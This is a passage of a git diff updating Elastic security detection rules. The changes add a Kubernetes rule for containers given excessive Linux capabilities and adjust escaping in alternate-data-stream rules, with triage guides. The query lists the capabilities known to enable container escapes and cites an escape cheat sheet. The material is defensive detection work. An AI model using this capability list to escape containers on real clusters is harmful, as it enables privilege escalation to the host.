"Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json new file mode 100644 index 00000000000..4f6381c26b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects a container deployed with one or more dangerously permissive Linux capabilities. An attacker with the ability to deploy a container with added capabilities could use this for further execution, lateral movement, or privilege escalation within a cluster. The capabilities detected in this rule have been used in container escapes to the host machine.", + "false_positives": [ + "Some container images require the addition of privileged capabilities. This rule leaves space for the exception of trusted container images. To add an exception, add the trusted container image name to the query field, kubernetes.audit.requestObject.spec.containers.image." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Container Created with Excessive Linux Capabilities", + "note": "## Triage and analysis\n\n### Investigating Kubernetes Container Created with Excessive Linux Capabilities\n\nLinux capabilities were designed to divide root privileges into smaller units. Each capability grants a thread just enough power to perform specific privileged tasks. In Kubernetes, containers are given a set of default capabilities that can be dropped or added to at the time of creation. Added capabilities entitle containers in a pod with additional privileges that can be used to change\ncore processes, change network settings of a cluster, or directly access the underlying host. The following have been used in container escape techniques:\n\nBPF - Allow creating BPF maps, loading BPF Type Format (BTF) data, retrieve JITed code of BPF programs, and more.\nDAC_READ_SEARCH - Bypass file read permission checks and directory read and execute permission checks.\nNET_ADMIN - Perform various network-related operations.\nSYS_ADMIN - Perform a range of system administration operations.\nSYS_BOOT - Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution.\nSYS_MODULE - Load and unload kernel modules.\nSYS_PTRACE - Trace arbitrary processes using ptrace(2).\nSYS_RAWIO - Perform I/O port operations (iopl(2) and ioperm(2)).\nSYSLOG - Perform privileged syslog(2) operations.\n\n### False positive analysis\n\n- While these capabilities are not included by default in containers, some legitimate images may need to add them. This rule leaves space for the exception of trusted container images. To add an exception, add the trusted container image name to the query field, kubernetes.audit.requestObject.spec.containers.image.", + "query": "event.dataset: kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb: create\n and kubernetes.audit.objectRef.resource: pods\n and kubernetes.audit.requestObject.spec.containers.securityContext.capabilities.add: (\"BPF\" or \"DAC_READ_SEARCH\" or \"NET_ADMIN\" or \"SYS_ADMIN\" or \"SYS_BOOT\" or \"SYS_MODULE\" or \"SYS_PTRACE\" or \"SYS_RAWIO\" or \"SYSLOG\")\n and not kubernetes.audit.requestObject.spec.containers.image : (\"docker.elastic.co/beats/elastic-agent:8.4.0\" or \"rancher/klipper-lb:v0.3.5\" or \"\")\n", + "references": [ + "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container", + "https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities", + "https://man7.org/linux/man-pages/man7/capabilities.7.html", + "https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.securityContext.capabilities.add", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7164081a-3930-11ed-a261-0242ac120002", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "7164081a-3930-11ed-a261-0242ac120002_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json index a65f8bf29e9..78bbfe8b089 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json index 5dbe2cb3073..65350d74fd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json index e5712619a5c..ead90899bec 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json index 90cfc1cf60a..82160b43461 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_106.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json index 90bb1b0401f..fe9f288d456 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_207.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json index 26cbc6c8df9..40731d27efd 100644 --- a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_208.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json index 4a8babbec73..6a24c739248 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json index 40041e44167..371a4369cf7 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json index 5090d38f377..f66fc9f5403 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the 